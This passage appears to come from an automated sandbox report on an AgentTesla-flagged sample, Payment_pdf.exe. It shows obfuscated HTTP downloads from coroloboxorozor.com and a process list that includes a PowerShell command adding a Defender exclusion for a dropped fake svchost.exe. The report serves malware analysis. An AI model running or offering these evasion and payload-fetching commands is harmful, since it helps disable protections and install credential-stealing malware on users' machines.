                                                                      Data Raw: 36 62 62 35 0d 0a 3c 70 3e 6b 6b 46 63 54 46 6c 4f 4f 46 54 46 79 46 54 46 54 46 54 46 4f 46 54 46 54 46 54 46 66 52 52 46 66 52 52 46 54 46 54 46 6c 43 4f 46 54 46 54 46 54 46 54 46 54 46 54 46 54 46 65 4f 46 54 46 54 46 54 46 54 46 54 46 54 46 54 46 54 46 54 46 54 46 54 46 54 46 54 46 54 46 54 46 54 46 54 46 54 46 54 46 54 46 54 46 54 46 54 46 54 46 54 46 54 46 54 46 54 46 54 46 54 46 54 46 54 46 54 46 54 46 54 46 6c 66 43 46 54 46 54 46 54 46 6c 4f 46 79 6c 46 6c 43 65 46 6c 4f 46 54 46 6c 43 54 46 63 46 66 54 52 46 79 79 46 6c 43 4f 46 6c 46 6b 65 46 66 54 52 46 79 79 46 43 4f 46 6c 54 4f 46 6c 54 52 46 6c 6c 52 46 79 66 46 6c 6c 66 46 6c 6c 4f 46 6c 6c 6c 46 6c 54 79 46 6c 6c 4f 46 63 6b 46 6c 54 63 46 79 66 46 63 63 46 63 6b 46 6c 6c 54 46 6c 6c 54 46 6c 6c 6c 46 6c 6c 65 46 79 66 46 63 43 46 6c 54 6c 46 79 66 46 6c 6c 4f 46 6c 6c 6b 46 6c 6c 54 46 79 66 46 6c 54 52 46 6c 6c 54 46 79 66 46 65 43 46 6b 63 46 43 79 46 79 66 46 6c 54 63 46 6c 6c 6c 46 6c 54 54 46 6c 54 6c 46 4f 65 46 6c 79 46 6c 79 46 6c 54 46 79 65 46 54 46 54 46 54 46 54 46 54 46 54 46 54 46 43 54 46 65 63 46 54 46 54 46 6b 65 46 6c 46 79 46 54 46 6b 65 46 6c 4f 66 46 4f 6c 46 6c 43 54 46 54 46 54 46 54 46 54 46 54 46 54 46 54 46 54 46 66 66 4f 46 54 46 79 4f 46 54 46 6c 6c 46 6c 46 43 54 46 54 46 54 46 6c 52 66 46 6c 54 46 54 46 54 46 65 46 54 46 54 46 54 46 54 46 54 46 54 46 65 66 46 6c 43 79 46 6c 54 46 54 46 54 46 79 66 46 54 46 54 46 54 46 6c 63 66 46 6c 54 46 54 46 54 46 54 46 54 46 6c 66 43 46 54 46 79 66 46 54 46 54 46 54 46 66 46 54 46 54 46 4f 46 54 46 54 46 54 46 54 46 54 46 54 46 54 46 4f 46 54 46 54 46 54 46
                                                                      Data Ascii: 6bb5<p>kkFcTFlOOFTFyFTFTFTFOFTFTFTFfRRFfRRFTFTFlCOFTFTFTFTFTFTFTFeOFTFTFTFTFTFTFTFTFTFTFTFTFTFTFTFTFTFTFTFTFTFTFTFTFTFTFTFTFTFTFTFTFTFTFTFlfCFTFTFTFlOFylFlCeFlOFTFlCTFcFfTRFyyFlCOFlFkeFfTRFyyFCOFlTOFlTRFllRFyfFllfFllOFlllFlTyFllOFckFlTcFyfFccFckFllTFllTFlllFlleFyfFcCFlTlFyfFllOFllkFllTFyfFlTRFllTFyfFeCFkcFCyFyfFlTcFlllFlTTFlTlFOeFlyFlyFlTFyeFTFTFTFTFTFTFTFCTFecFTFTFkeFlFyFTFkeFlOfFOlFlCTFTFTFTFTFTFTFTFTFffOFTFyOFTFllFlFCTFTFTFlRfFlTFTFTFeFTFTFTFTFTFTFefFlCyFlTFTFTFyfFTFTFTFlcfFlTFTFTFTFTFlfCFTFyfFTFTFTFfFTFTFOFTFTFTFTFTFTFTFOFTFTFTF
                                                                      Feb 23, 2021 09:30:36.831592083 CET19946OUTGET /base/81C3FE323C5502E2AE417434B3B29FF7.html HTTP/1.1
                                                                      Host: coroloboxorozor.com
                                                                      Feb 23, 2021 09:30:37.022202015 CET19947INHTTP/1.1 200 OK
                                                                      Date: Tue, 23 Feb 2021 08:30:36 GMT
                                                                      Content-Type: text/html
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Set-Cookie: __cfduid=d2060dab256016dc3f4aaa5d51adaf82e1614069036; expires=Thu, 25-Mar-21 08:30:36 GMT; path=/; domain=.coroloboxorozor.com; HttpOnly; SameSite=Lax
                                                                      Last-Modified: Tue, 23 Feb 2021 05:12:51 GMT
                                                                      Vary: Accept-Encoding
                                                                      X-Frame-Options: SAMEORIGIN
                                                                      CF-Cache-Status: DYNAMIC
                                                                      cf-request-id: 086f9c0f4600004be3e1012000000001
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=AsifCZaIJ3cI6%2BF0FyXTf%2FtsdKub7L10y%2FQ9KmUF18rTRBqeK9e7DN53HQOmxIdiQnYsZCfDzc5eyMNchnFSt050g9E0LohpUZZQb0oHZWFSyDoV"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 625f95f87e2f4be3-AMS
                                                                      Data Raw: 33 32 32 39 0d 0a 3c 70 3e 79 46 6c 63 65 46 66 4f 54 46 66 4f 6c 46 6c 6b 63 46 6c 43 54 46 66 66 52 46 65 66 46 65 79 46 63 52 46 6c 66 43 46 6c 4f 63 46 66 54 6b 46 66 66 6c 46 66 4f 66 46 66 52 79 46 6c 4f 6c 46 66 6c 4f 46 6c 6b 54 46 6c 6b 66 46 66 4f 6c 46 66 52 52 46 6c 6b 65 46 6c 43 65 46 66 79 66 46 66 4f 43 46 79 54 46 6b 54 46 6c 4f 65 46 6c 65 66 46 66 4f 43 46 6c 6c 54 46 6c 52 54 46 66 4f 66 46 66 4f 6b 46 6c 6c 79 46 6c 79 6c 46 66 4f 6b 46 66 46 6c 79 54 46 66 54 4f 46 6c 79 4f 46 6c 6c 65 46 66 4f 66 46 65 66 46 6c 43 43 46 6b 43 46 66 79 4f 46 6b 66 46 6c 6c 46 66 79 65 46 43 65 46 6c 4f 54 46 66 4f 65 46 66 79 54 46 6b 66 46 6c 52 63 46 6c 46 52 52 46 66 4f 65 46 66 46 6c 66 65 46 6c 4f 43 46 66 66 54 46 66 66 79 46 6c 79 6b 46 6c 46 6b 6c 46 6c 54 4f 46 66 4f 6b 46 66 54 6b 46 66 6b 46 6c 6b 6b 46 66 4f 63 46 66 54 43 46 66 6c 43 46 6c 63 79 46 66 54 79 46 66 54 52 46 66 66 79 46 66 52 52 46 6c 6b 46 52 63 46 43 52 46 6c 66 79 46 66 4f 63 46 66 54 66 46 66 54 52 46 6c 6c 46 66 6b 46 66 6c 6c 46 66 66 79 46 6c 43 65 46 66 54 66 46 52 6c 46 79 43 46 43 4f 46 43 79 46 63 54 46 66 79 54 46 6c 66 6b 46 6c 52 46 66 66 66 46 63 52 46 6c 63 46 6c 79 46 63 66 46 65 79 46 65 63 46 4f 4f 46 43 52 46 65 52 46 79 6b 46 6c 63 46 63 65 46 4f 65 46 66 79 54 46 66 54 6c 46 6c 79 63 46 4f 54 46 6c 43 6b 46 6c 54 52 46 54 46 6c 65 65 46 6c 66 52 46 79 79 46 66 79 6b 46 6c 52 54 46 6c 66 66 46 6c 65 46 6c 65 46 6c 6b 65 46 6b 6c 46 66 66 43 46 63 65 46 66 4f 54 46 6c 4f 65 46 4f 66 46 6c 6b 65 46 65 65 46 79 54 46 66 6c 66 46 43 65 46 6c 6c 46 54 46 6c 52 54 46 6c 6c 43 46 4f 66 46 66 4f 65
                                                                      Data Ascii: 3229<p>yFlceFfOTFfOlFlkcFlCTFffRFefFeyFcRFlfCFlOcFfTkFfflFfOfFfRyFlOlFflOFlkTFlkfFfOlFfRRFlkeFlCeFfyfFfOCFyTFkTFlOeFlefFfOCFllTFlRTFfOfFfOkFllyFlylFfOkFfFlyTFfTOFlyOFlleFfOfFefFlCCFkCFfyOFkfFllFfyeFCeFlOTFfOeFfyTFkfFlRcFlFRRFfOeFfFlfeFlOCFffTFffyFlykFlFklFlTOFfOkFfTkFfkFlkkFfOcFfTCFflCFlcyFfTyFfTRFffyFfRRFlkFRcFCRFlfyFfOcFfTfFfTRFllFfkFfllFffyFlCeFfTfFRlFyCFCOFCyFcTFfyTFlfkFlRFfffFcRFlcFlyFcfFeyFecFOOFCRFeRFykFlcFceFOeFfyTFfTlFlycFOTFlCkFlTRFTFleeFlfRFyyFfykFlRTFlffFleFleFlkeFklFffCFceFfOTFlOeFOfFlkeFeeFyTFflfFCeFllFTFlRTFllCFOfFfOe
                                                                      Feb 23, 2021 09:30:37.387065887 CET21008OUTGET /base/4E6D09D3FE7F5C729D5893BBC810E319.html HTTP/1.1
                                                                      Host: coroloboxorozor.com
                                                                      Feb 23, 2021 09:30:37.471384048 CET21010INHTTP/1.1 200 OK
                                                                      Date: Tue, 23 Feb 2021 08:30:37 GMT
                                                                      Content-Type: text/html
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Set-Cookie: __cfduid=d62d8db6be29afa6b7f124b21f9f14dd01614069037; expires=Thu, 25-Mar-21 08:30:37 GMT; path=/; domain=.coroloboxorozor.com; HttpOnly; SameSite=Lax
                                                                      Last-Modified: Tue, 23 Feb 2021 05:12:53 GMT
                                                                      Vary: Accept-Encoding
                                                                      X-Frame-Options: SAMEORIGIN
                                                                      CF-Cache-Status: DYNAMIC
                                                                      cf-request-id: 086f9c117000004be341089000000001
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=uxBE6PhycqoRFxGuVigyNbLWGEh1zhGU%2Bh9VntMA7XYirhGnBZhXOf73XJDa9ffcBsPmZOA2zHzayDACBIzNopEIbxpY4zab%2BjNZ1UlQlyWn81fy"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 625f95fbeeee4be3-AMS
                                                                      Data Raw: 32 38 37 36 0d 0a 3c 70 3e 46 6c 6c 52 46 54 46 6c 6c 6b 46 54 46 6c 6c 66 46 54 46 79 6b 46 54 46 6c 6c 65 46 54 46 79 6b 46 54 46 6c 6c 65 46 54 46 6c 66 54 46 54 46 6c 54 43 46 54 46 6c 54 6c 46 54 46 6c 54 79 46 54 46 6c 66 54 46 54 46 6c 54 52 46 54 46 63 63 46 54 46 79 6b 46 54 46 6c 6c 6c 46 54 46 79 6b 46 54 46 63 6b 46 54 46 6c 6c 63 46 54 46 6c 6c 63 46 54 46 6c 54 63 46 54 46 79 6b 46 54 46 6c 6c 66 46 54 46 79 6b 46 54 46 6c 54 54 46 54 46 6c 54 63 46 54 46 6c 54 6b 46 54 46 6c 66 54 46 54 46 6c 54 66 46 54 46 6c 6c 6c 46 54 46 6c 6c 52 46 54 46 6c 6c 65 46 54 46 6c 54 65 46 54 46 6c 66 54 46 54 46 6c 54 66 46 54 46 79 6b 46 54 46 79 66 46 54 46 79 6b 46 54 46 6c 54 43 46 54 46 6c 6c 6c 46 54 46 6c 6c 65 46 54 46 79 6b 46 54 46 43 6b 46 54 46 79 6b 46 54 46 6c 6c 6b 46 54 46 6c 54 4f 46 54 46 6c 6c 63 46 54 46 6c 6c 65 46 54 46 79 6b 46 54 46 6c 54 54 46 54 46 79 6b 46 54 46 6c 66 6c 46 54 46 6c 6c 65 46 54 46 63 43 46 54 46 6c 54 6b 46 54 46 6c 6c 66 46 54 46 6c 6c 65 46 54 46 6c 6c 52 46 54 46 63 43 46 54 46 63 43 46 54 46 6c 54 79 46 54 46 79 6b 46 54 46 6c 54 52 46 54 46 79 6b 46 54 46 6c 54 52 46 54 46 63 63 46 54 46 6c 6c 52 46 54 46 63 43 46 54 46 6c 66 6c 46 54 46 6c 54 65 46 54 46 6c 66 66 46 54 46 6c 54 63 46 54 46 6c 54 66 46 54 46 6c 54 54 46 54 46 6c 66 66 46 54 46 63 43 46 54 46 79 6b 46 54 46 43 79 46 54 46 79 6b 46 54 46 63 43 46 54 46 6c 6c 54 46 54 46 6c 6c 66 46 54 46 6c 54 54 46 54 46 6c 6c 66 46 54 46 6c 6c 79 46 54 46 6c 54 6c 46 54 46 6c 6c 6b 46 54 46 6c 6c 4f 46 54 46 6c 54 65 46 54 46 63 6b 46 54 46 79 6b 46 54 46 6c 54 6c 46 54 46 79 6b 46 54 46 63 6b 46 54 46
                                                                      Data Ascii: 2876<p>FllRFTFllkFTFllfFTFykFTFlleFTFykFTFlleFTFlfTFTFlTCFTFlTlFTFlTyFTFlfTFTFlTRFTFccFTFykFTFlllFTFykFTFckFTFllcFTFllcFTFlTcFTFykFTFllfFTFykFTFlTTFTFlTcFTFlTkFTFlfTFTFlTfFTFlllFTFllRFTFlleFTFlTeFTFlfTFTFlTfFTFykFTFyfFTFykFTFlTCFTFlllFTFlleFTFykFTFCkFTFykFTFllkFTFlTOFTFllcFTFlleFTFykFTFlTTFTFykFTFlflFTFlleFTFcCFTFlTkFTFllfFTFlleFTFllRFTFcCFTFcCFTFlTyFTFykFTFlTRFTFykFTFlTRFTFccFTFllRFTFcCFTFlflFTFlTeFTFlffFTFlTcFTFlTfFTFlTTFTFlffFTFcCFTFykFTFCyFTFykFTFcCFTFllTFTFllfFTFlTTFTFllfFTFllyFTFlTlFTFllkFTFllOFTFlTeFTFckFTFykFTFlTlFTFykFTFckFTF


                                                                      Code Manipulations

                                                                      Statistics

                                                                      Behavior

                                                                      Click to jump to process

                                                                      System Behavior

                                                                      General

                                                                      Start time:09:28:31
                                                                      Start date:23/02/2021
                                                                      Path:C:\Users\user\Desktop\Payment_pdf.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:'C:\Users\user\Desktop\Payment_pdf.exe'
                                                                      Imagebase:0x230000
                                                                      File size:630336 bytes
                                                                      MD5 hash:AA4F187DF7370B07D17CBE08ABD778A0
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:.Net C# or VB.NET
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.423869749.0000000003AAE000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.453125199.00000000044AE000.00000004.00000001.sdmp, Author: Joe Security
                                                                      Reputation:low

                                                                      General

                                                                      Start time:09:28:41
                                                                      Start date:23/02/2021
                                                                      Path:C:\Windows\System32\svchost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                      Imagebase:0x7ff6b7590000
                                                                      File size:51288 bytes
                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high

                                                                      General

                                                                      Start time:09:28:58
                                                                      Start date:23/02/2021
                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\xwPVuQKYPFmJR\svchost.exe' -Force
                                                                      Imagebase:0xd30000
                                                                      File size:430592 bytes
                                                                      MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:.Net C# or VB.NET
                                                                      Reputation:high

                                                                      General

                                                                      Start time:09:28:59
                                                                      Start date:23/02/2021
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff61de10000
                                                                      File size:625664 bytes
                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high

                                                                      General

                                                                      Start time:09:28:59
                                                                      Start date:23/02/2021
                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:'C:\Windows\System32\cmd.exe' /c timeout 1
                                                                      Imagebase:0x2a0000
                                                                      File size:232960 bytes
                                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high

                                                                      General

                                                                      Start time:09:29:00
                                                                      Start date:23/02/2021
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff61de10000
                                                                      File size:625664 bytes
                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high

                                                                      General

                                                                      Start time:09:29:00
                                                                      Start date:23/02/2021
                                                                      Path:C:\Windows\SysWOW64\timeout.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:timeout 1
                                                                      Imagebase:0xd60000
                                                                      File size:26112 bytes
                                                                      MD5 hash:121A4EDAE60A7AF6F5DFA82F7BB95659
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high

                                                                      General

                                                                      Start time:09:29:02
                                                                      Start date:23/02/2021
                                                                      Path:C:\Windows\System32\svchost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                      Imagebase:0x7ff6b7590000
                                                                      File size:51288 bytes
                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high

                                                                      General

                                                                      Start time:09:29:05
                                                                      Start date:23/02/2021
                                                                      Path:C:\Users\user\Desktop\Payment_pdf.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Users\user\Desktop\Payment_pdf.exe
                                                                      Imagebase:0x9a0000
                                                                      File size:630336 bytes
                                                                      MD5 hash:AA4F187DF7370B07D17CBE08ABD778A0
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:.Net C# or VB.NET
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000C.00000002.594360112.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                      Reputation:low

                                                                      General

                                                                      Start time:09:29:08
                                                                      Start date:23/02/2021
                                                                      Path:C:\Windows\System32\svchost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                      Imagebase:0x7ff6b7590000
                                                                      File size:51288 bytes
                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high

                                                                      General

                                                                      Start time:09:29:08
                                                                      Start date:23/02/2021
                                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 6968 -ip 6968
                                                                      Imagebase:0x1390000
                                                                      File size:434592 bytes
                                                                      MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high

                                                                      General

                                                                      Start time:09:29:09
                                                                      Start date:23/02/2021
                                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6968 -s 2032
                                                                      Imagebase:0x1390000
                                                                      File size:434592 bytes
                                                                      MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:.Net C# or VB.NET
                                                                      Reputation:high

                                                                      General

                                                                      Start time:09:29:11
                                                                      Start date:23/02/2021
                                                                      Path:C:\Windows\explorer.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:'C:\Windows\explorer.exe' 'C:\Windows\Resources\Themes\aero\Shell\xwPVuQKYPFmJR\svchost.exe'
                                                                      Imagebase:0x7ff6f22f0000
                                                                      File size:3933184 bytes
                                                                      MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high

                                                                      General

                                                                      Start time:09:29:13
                                                                      Start date:23/02/2021
                                                                      Path:C:\Windows\explorer.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
                                                                      Imagebase:0x7ff6f22f0000
                                                                      File size:3933184 bytes
                                                                      MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high

                                                                      General

                                                                      Start time:09:29:14
                                                                      Start date:23/02/2021
                                                                      Path:C:\Windows\Resources\Themes\aero\shell\xwPVuQKYPFmJR\svchost.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:'C:\Windows\Resources\Themes\aero\shell\xwPVuQKYPFmJR\svchost.exe'
                                                                      Imagebase:0xd10000
                                                                      File size:630336 bytes
                                                                      MD5 hash:AA4F187DF7370B07D17CBE08ABD778A0
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:.Net C# or VB.NET
                                                                      Antivirus matches:
                                                                      • Detection: 100%, Joe Sandbox ML
                                                                      • Detection: 21%, ReversingLabs

                                                                      General

                                                                      Start time:09:29:19
                                                                      Start date:23/02/2021
                                                                      Path:C:\Windows\explorer.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:'C:\Windows\explorer.exe' 'C:\Windows\Resources\Themes\aero\Shell\xwPVuQKYPFmJR\svchost.exe'
                                                                      Imagebase:0x7ff6f22f0000
                                                                      File size:3933184 bytes
                                                                      MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language

                                                                      General

                                                                      Start time:09:29:21
                                                                      Start date:23/02/2021
                                                                      Path:C:\Windows\explorer.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
                                                                      Imagebase:0x7ff6f22f0000
                                                                      File size:3933184 bytes
                                                                      MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language

                                                                      General

                                                                      Start time:09:29:20
                                                                      Start date:23/02/2021
                                                                      Path:C:\Windows\System32\svchost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                      Imagebase:0x7ff6b7590000
                                                                      File size:51288 bytes
                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language

                                                                      General

                                                                      Start time:09:29:23
                                                                      Start date:23/02/2021
                                                                      Path:C:\Windows\Resources\Themes\aero\shell\xwPVuQKYPFmJR\svchost.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:'C:\Windows\Resources\Themes\aero\shell\xwPVuQKYPFmJR\svchost.exe'
                                                                      Imagebase:0x390000
                                                                      File size:630336 bytes
                                                                      MD5 hash:AA4F187DF7370B07D17CBE08ABD778A0
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:.Net C# or VB.NET

                                                                      General

                                                                      Start time:09:29:37
                                                                      Start date:23/02/2021
                                                                      Path:C:\Windows\System32\svchost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                      Imagebase:0x7ff6b7590000
                                                                      File size:51288 bytes
                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language

                                                                      General

                                                                      Start time:09:30:00
                                                                      Start date:23/02/2021
                                                                      Path:C:\Windows\System32\svchost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                      Imagebase:0x7ff6b7590000
                                                                      File size:51288 bytes
                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language

                                                                      General

                                                                      Start time:09:30:07
                                                                      Start date:23/02/2021
                                                                      Path:C:\Users\user\AppData\Roaming\CZVkY\CZVkY.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:'C:\Users\user\AppData\Roaming\CZVkY\CZVkY.exe'
                                                                      Imagebase:0x630000
                                                                      File size:630336 bytes
                                                                      MD5 hash:AA4F187DF7370B07D17CBE08ABD778A0
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:.Net C# or VB.NET
                                                                      Antivirus matches:
                                                                      • Detection: 100%, Joe Sandbox ML
                                                                      • Detection: 21%, ReversingLabs

                                                                      General

                                                                      Start time:09:30:16
                                                                      Start date:23/02/2021
                                                                      Path:C:\Users\user\AppData\Roaming\CZVkY\CZVkY.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:'C:\Users\user\AppData\Roaming\CZVkY\CZVkY.exe'
                                                                      Imagebase:0xac0000
                                                                      File size:630336 bytes
                                                                      MD5 hash:AA4F187DF7370B07D17CBE08ABD778A0
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:.Net C# or VB.NET

                                                                      General

                                                                      Start time:09:30:22
                                                                      Start date:23/02/2021
                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\xwPVuQKYPFmJR\svchost.exe' -Force
                                                                      Imagebase:0xd30000
                                                                      File size:430592 bytes
                                                                      MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:.Net C# or VB.NET

                                                                      General

                                                                      Start time:09:30:23
                                                                      Start date:23/02/2021
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff61de10000
                                                                      File size:625664 bytes
                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language

                                                                      General

                                                                      Start time:09:30:25
                                                                      Start date:23/02/2021
                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:'C:\Windows\System32\cmd.exe' /c timeout 1
                                                                      Imagebase:0x2a0000
                                                                      File size:232960 bytes
                                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language

                                                                      Disassembly

                                                                      Code Analysis

                                                                      Reset < >